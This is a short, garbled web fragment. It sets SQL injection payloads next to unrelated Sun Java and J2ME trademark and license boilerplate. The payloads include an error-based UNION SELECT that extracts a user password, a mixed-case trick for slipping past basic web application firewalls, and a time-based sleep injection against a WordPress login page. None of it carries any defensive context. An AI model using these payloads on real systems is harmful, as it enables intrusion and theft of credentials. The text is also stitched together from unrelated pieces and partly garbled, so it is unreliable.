file.php?var=1 union select password from users where id=1 and row(1,1)>(select count(*),concat( (select users.password) ,0x3a,floor(rand()*2)) x
Instead of union UnIoN In some basic WAF’s this will work. An example in URL
Word Trace search letters: lmw/wp-login.php''+AnD+sLeep(3)+ANd+'1'A=0.
Java and all Java based trademarks and logos are trademarks or registered trademarks of Sun Microsystems, Inc. in the U.S. and other countries. End-user license agreement for Sun™ Java™ J2ME™. Smart-Fit Rendering is a trademark or registered trademark of ACCESS CO., LTD...